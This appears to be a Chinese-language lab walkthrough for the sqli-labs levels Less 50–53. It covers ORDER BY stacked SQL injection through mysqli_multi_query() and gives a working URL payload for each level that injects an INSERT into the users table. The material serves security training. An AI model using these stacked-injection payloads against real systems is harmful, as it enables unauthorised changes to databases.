Less 50

基于错误_GET_数字型_排序堆叠注入

Page 3 的关卡组成如下：

Less 38 - Less 41：GET 型堆叠注入
Less 42 - Less 45：POST 型堆叠注入
Less 46 - Less 49：排序注入
Less 50 - Less 53：排序堆叠注入

我们从源码可以看到，一般后台查询数据库使用的语句都是mysql_query()，而可以堆叠注入的后台使用的是mysqli_multi_query()。

上文排序注入的方法在这关基本同样适用，但是基于报错注入在未注释 MySQL 报错信息的时候并不会报错，而返回一个空表：

其他排序注入方法参考 Less 46。

同理，上文堆叠注入的方法也同样适用：

?sort=1;insert into users(id,username,password) values(50,'Less50','Less50')--+

堆叠注入的原理参考 Less 38。

Less 51

基于错误_GET_字符型_单引号_排序堆叠注入

?sort=1';insert into users(id,username,password) values(51,'Less51','Less51')--+

Less 52

基于Bool_GET_数字型_盲注_堆叠注入

?sort=1;insert into users(id,username,password) values(52,'Less52','Less52')--+

Less 53

基于Bool_GET_单引号_字符型_盲注_堆叠注入

?sort=1';insert into users(id,username,password) values(53,'Less53','Less53')--+